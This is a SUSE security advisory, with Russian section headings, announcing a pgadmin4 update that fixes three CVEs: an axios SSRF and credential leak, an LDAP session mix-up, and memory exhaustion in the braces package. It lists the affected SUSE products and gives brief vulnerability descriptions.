Описание
Security update for pgadmin4
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user's session if two users authenticate simultaneously via ldap (bsc#1234840)
- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)
Список пакетов
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS
SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS
SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS
SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS
SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS
SUSE Linux Enterprise Module for Python 3 15 SP6
SUSE Linux Enterprise Server 15 SP3-LTSS
SUSE Linux Enterprise Server 15 SP4-LTSS
SUSE Linux Enterprise Server 15 SP5-LTSS
SUSE Linux Enterprise Server for SAP Applications 15 SP3
SUSE Linux Enterprise Server for SAP Applications 15 SP4
SUSE Linux Enterprise Server for SAP Applications 15 SP5
SUSE Manager Proxy 4.3
SUSE Manager Server 4.3
Ссылки
- Link for SUSE-SU-2025:1326-1
- E-Mail link for SUSE-SU-2025:1326-1
- SUSE Security Ratings
- SUSE Bug 1224295
- SUSE Bug 1234840
- SUSE Bug 1239308
- SUSE CVE CVE-2023-1907 page
- SUSE CVE CVE-2024-4068 page
- SUSE CVE CVE-2025-27152 page
Описание
A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user's session if multiple connection attempts occur simultaneously.
Затронутые продукты
Ссылки
- CVE-2023-1907
- SUSE Bug 1234840
Описание
The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
Затронутые продукты
Ссылки
- CVE-2024-4068
- SUSE Bug 1224256
Описание
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
Затронутые продукты
Ссылки
- CVE-2025-27152
- SUSE Bug 1239305